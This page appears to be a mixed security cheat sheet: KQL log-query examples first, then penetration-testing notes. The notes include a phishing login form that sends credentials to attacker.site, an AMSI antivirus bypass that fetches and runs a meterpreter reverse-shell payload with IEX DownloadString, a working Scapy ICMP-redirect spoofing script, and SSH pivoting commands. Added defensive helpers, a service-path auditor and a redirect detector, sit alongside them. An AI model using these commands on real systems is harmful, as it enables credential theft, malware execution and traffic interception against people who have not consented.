
KQL – Count

count returns the number of rows in its input (here: the rows left after the where filter)

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| count


KQL – Take & Limit

take returns the requested number of records from the data set, with no guarantee of which records you get (useful for a quick look at the data)

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| take 5

limit is an alias of take and is likewise used to cap the number of records returned

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| limit 5


KQL – Where

where filters the result set: only rows for which the condition is true pass on to the next operator

Return the rows generated in the last hour

Perf
| where TimeGenerated >= ago(1h)

ago() subtracts a timespan from the current time, which lets you select relative date ranges; timespan units:

  • d – days
  • h – hours
  • m – minutes
  • s – seconds
  • ms – milliseconds
  • microsecond – microseconds

Combine conditions in one where with and

Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0

Combine conditions with or (use parentheses to group the alternatives)

Perf
| where TimeGenerated >= ago(1h)
and (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
and CounterValue > 0

Stacking where operators (useful when other processing steps, such as if/else logic, sit between the filters)

Perf
| where TimeGenerated >= ago(1h)
| where (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
| where CounterValue > 0

Emulate search with where and string operators (has, hasprefix, hassuffix and contains are case-insensitive; has works on whole terms, contains on any substring)

//Search any column for the whole term Bytes (has is term-based)

Perf
| where * has "Bytes"

//Search any column for a term that starts with Bytes
Perf
| where * hasprefix "Bytes"

//Search any column for a term that ends with Bytes
Perf
| where * hassuffix "Bytes"

//Search any column for the substring Bytes (contains matches anywhere in the string)
Perf
| where * contains "Bytes"

//Search one column with a regular expression (case-sensitive)
Perf
| where InstanceName matches regex "[A-Z]:"


KQL – Search

Search for a string across all tables in the workspace (very expensive; do not use in production!)

search "memory"

Limit string search to a specific range of tables

search in (Perf, Events) "memory"

Limit string search to one table

Perf | search "memory"

Search for exact string "Available MBytes"

Perf | search CounterName == "Available MBytes"

Search a single column for values containing MBytes

Perf | search CounterName:"MBytes"

Search all columns for the string Bytes

Perf | search "Bytes"

Search for string in all columns starting with Bytes

Perf | search * startswith "Bytes"

Search for string in all columns ending with Bytes

Perf | search * endswith "Bytes"

Search all columns for a value that starts with Free and ends with Bytes (wildcard search)

Perf | search "Free*bytes"

Same as above, restricted to rows that also contain C: or D:

Perf | search "Free*bytes" and ("C:" or "D:")

Search table column for string using regex

Perf
| search InstanceName matches regex "[A-Z]:"


Find unquoted service paths (Win)

wmic service get name,displayname,pathname,startmode | findstr /I "auto" | findstr /I /v "c:\windows\\" | findstr /i /v """
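The findstr chain above only filters on start mode, the Windows directory and the presence of a quote character; the condition that actually makes a service path a problem is a space somewhere in an unquoted image path. The following Python audit helper is an added example (not from the original page) that applies that condition to service rows and produces the quoted PathName a remediation would set. The Service rows, names and paths are constructed for this example.

```python
import re
from dataclasses import dataclass


@dataclass
class Service:
    name: str
    pathname: str   # PathName as reported by wmic / sc qc
    startmode: str  # Auto, Manual, Disabled


# Constructed sample rows shaped like `wmic service get name,pathname,startmode`.
# Names and paths are made up for this example.
SAMPLE_SERVICES = [
    Service("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe" -svc', "Auto"),
    Service("BadSvc", r"C:\Program Files\Bad Vendor\bad.exe -svc", "Auto"),
    Service("NoSpaces", r"C:\Tools\tool.exe", "Auto"),
    Service("ManualSvc", r"C:\Program Files\Manual Vendor\manual.exe", "Manual"),
    Service("WinSvc", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
]

_IMAGE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(pathname: str):
    """Split a service PathName into (image path, arguments)."""
    p = pathname.strip()
    if p.startswith('"'):                      # already quoted: image ends at the closing quote
        end = p.find('"', 1)
        if end != -1:
            return p[: end + 1], p[end + 1:].strip()
    m = _IMAGE_RE.match(p)                     # unquoted: image ends at the first .exe
    if m:
        return m.group(1), (m.group(2) or "").strip()
    return p, ""


def needs_quoting(pathname: str) -> bool:
    """True when the image path is unquoted and contains a space."""
    image, _ = split_image_path(pathname)
    return not image.startswith('"') and " " in image


def quoted_pathname(pathname: str) -> str:
    """The corrected PathName: image path in quotes, arguments untouched."""
    image, args = split_image_path(pathname)
    image = image.strip('"')
    return f'"{image}"' + (f" {args}" if args else "")


def audit_unquoted_paths(services, skip_windows_dir: bool = True):
    """Names of auto-start services with an unquoted image path containing spaces.
    Mirrors the page's findstr filters (Auto only, C:\\Windows\\ excluded)."""
    findings = []
    for svc in services:
        if svc.startmode.lower() != "auto":
            continue
        path_l = svc.pathname.strip().strip('"').lower()
        if skip_windows_dir and path_l.startswith("c:\\windows\\"):
            continue
        if needs_quoting(svc.pathname):
            findings.append(svc.name)
    return findings


if __name__ == "__main__":
    for name in audit_unquoted_paths(SAMPLE_SERVICES):
        svc = next(s for s in SAMPLE_SERVICES if s.name == name)
        print(f"{name}: {svc.pathname!r} -> {quoted_pathname(svc.pathname)!r}")
```

On the sample rows only BadSvc is reported; GoodSvc is already quoted, NoSpaces has no space in its image path, ManualSvc is not auto-start and WinSvc lives under C:\Windows\. The fix for a reported service is to set the quoted path, for example `sc config BadSvc binPath= "\"C:\Program Files\Bad Vendor\bad.exe\" -svc"` (note the space after `binPath=`).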


Harvest credentials

Start netcat listener

ncat -lvp 4444

Start ngrok to make the URL publicly accessible

./ngrok http 4444

Send page to users:

<b>Login required</b><br><br><b>ENTER Credentials:</b><br><br><form action="http://attacker.site" method="GET"><input type="text" name="email" placeholder="Your Username"><br><input type="password" name="password"><br><input type="submit" value="Submit"></form>

[screenshot: login prompt]


AV Evasion: bypass AMSI

1. create MSFVENOM

msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > '/home/kali/http/https2.ps1'

2. Download the raw bypass script from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass

curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1

3. Serve both files: python2 -m SimpleHTTPServer 80

4. IEX (New-Object Net.WebClient).DownloadString('http://10.10.20.142/demo.ps1');Invoke-AlokS-AvBypass

5. IEX (New-Object Net.WebClient).DownloadString('http://10.10.20.142/https2.ps1')


ICMP-Redirect Attack

Enable IP forwarding and source NAT for the victim subnet

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT   # only needed to let the forwarded traffic through
sudo iptables -t nat -L

  • gateway = 10.100.31.1
  • victim = 10.100.13.126
  • attacker = 10.100.13.20
  • victim web server = 10.23.56.100

Scapy: create an ICMP redirect packet (type 5, code 1) advertising a "better" gateway for destination 10.23.56.100 (interactive session)

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
<bound method IP.display of <IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
<bound method IP.display of <IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets
from scapy.all import IP, ICMP, TCP, send

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim IP

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Send continuously (the loop runs until interrupted)
while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
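From the defender's side, the following added Python example (not part of the original page or of Scapy) parses a raw IPv4 ICMP redirect with the standard library only, validates its checksum, extracts the advertised gateway and the quoted original packet, and flags redirects whose next hop or sender is not a known router. The sample frame is constructed inline from the lab addresses above; KNOWN_ROUTERS and all function names are this example's own assumptions.

```python
import struct
import ipaddress

# Routers that may legitimately issue ICMP redirects on the lab subnet.
# Assumption for this example, taken from the page's setup; adjust to your network.
KNOWN_ROUTERS = {"10.100.13.1"}


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum (IPv4/ICMP); 0 when data already carries a valid one."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header with a valid checksum (only used to build the sample)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def icmp_redirect(gateway: str, original: bytes) -> bytes:
    """ICMP type 5 / code 1 (redirect for host) quoting the original datagram."""
    body = ipaddress.IPv4Address(gateway).packed + original
    csum = inet_checksum(struct.pack("!BBH", 5, 1, 0) + body)
    return struct.pack("!BBH", 5, 1, csum) + body


def parse_icmp_redirect(frame: bytes):
    """Fields of an IPv4 ICMP redirect as a dict, or None if the frame is not a valid one."""
    if len(frame) < 20 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None                                    # not IPv4, or not ICMP
    icmp = frame[(frame[0] & 0x0F) * 4:]
    # 8-byte ICMP header + quoted IPv4 header (20) + first 8 bytes of its payload
    if len(icmp) < 36 or icmp[0] != 5 or inet_checksum(icmp) != 0:
        return None                                    # not a redirect, or bad checksum
    inner = icmp[8:]
    l4 = inner[(inner[0] & 0x0F) * 4:][:8]
    sport = dport = None
    if inner[9] in (6, 17) and len(l4) >= 4:           # TCP or UDP: ports are the first 4 bytes
        sport, dport = struct.unpack("!HH", l4[:4])
    return {
        "claimed_router": str(ipaddress.IPv4Address(frame[12:16])),
        "victim": str(ipaddress.IPv4Address(frame[16:20])),
        "code": icmp[1],
        "new_gateway": str(ipaddress.IPv4Address(icmp[4:8])),
        "original_src": str(ipaddress.IPv4Address(inner[12:16])),
        "original_dst": str(ipaddress.IPv4Address(inner[16:20])),
        "original_proto": inner[9],
        "original_sport": sport,
        "original_dport": dport,
    }


def is_suspicious(info: dict, known_routers=KNOWN_ROUTERS) -> bool:
    """Flag a redirect whose advertised next hop, or whose sender, is not a known router.
    The sender address is spoofable (the script above spoofs it), so the next-hop test matters most."""
    return info["new_gateway"] not in known_routers or info["claimed_router"] not in known_routers


# Constructed sample: the redirect from the scenario above (spoofed router -> victim,
# advertising the attacker host as the next hop towards the web server).
ORIGINAL_SYN = ipv4_header("10.100.13.126", "10.23.56.100", 6, 20) + struct.pack("!HHI", 55555, 80, 444444444)
_REDIRECT = icmp_redirect("10.100.13.20", ORIGINAL_SYN)
SAMPLE_REDIRECT = ipv4_header("10.100.13.1", "10.100.13.126", 1, len(_REDIRECT)) + _REDIRECT

if __name__ == "__main__":
    info = parse_icmp_redirect(SAMPLE_REDIRECT)
    print(info)
    print("SUSPICIOUS" if is_suspicious(info) else "ok")
```

Run on the sample the parser reports next hop 10.100.13.20 for the victim's 10.100.13.126:55555 -> 10.23.56.100:80 flow, which is not a known router and is therefore flagged. On Linux hosts the simplest mitigation is to ignore redirects entirely: `sysctl -w net.ipv4.conf.all.accept_redirects=0` and `net.ipv4.conf.default.accept_redirects=0`; routers that do not need to issue them can set `net.ipv4.conf.all.send_redirects=0`.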

Port Forwarding

Listen on local port 9999 and forward its traffic to the target's RDP port (3389) through an SSH tunnel via the compromised host

ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117

Start a SOCKS proxy on 127.0.0.1:1090 (ssh -D) and route traffic through the compromised host with proxychains

ssh -D 127.0.0.1:1090 msx@192.168.68.117

Usage example: nmap scan through the proxy (only TCP connect scans, -sT, work over a SOCKS proxy)

proxychains nmap -sT -v 10.10.20.140

Proxychains (use -sT because only full TCP connect scans traverse a SOCKS proxy; -PN skips the ICMP host discovery that would not go through the proxy)

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129

proxychains nmap -sTV -n -PN -p 21 10.10.51.21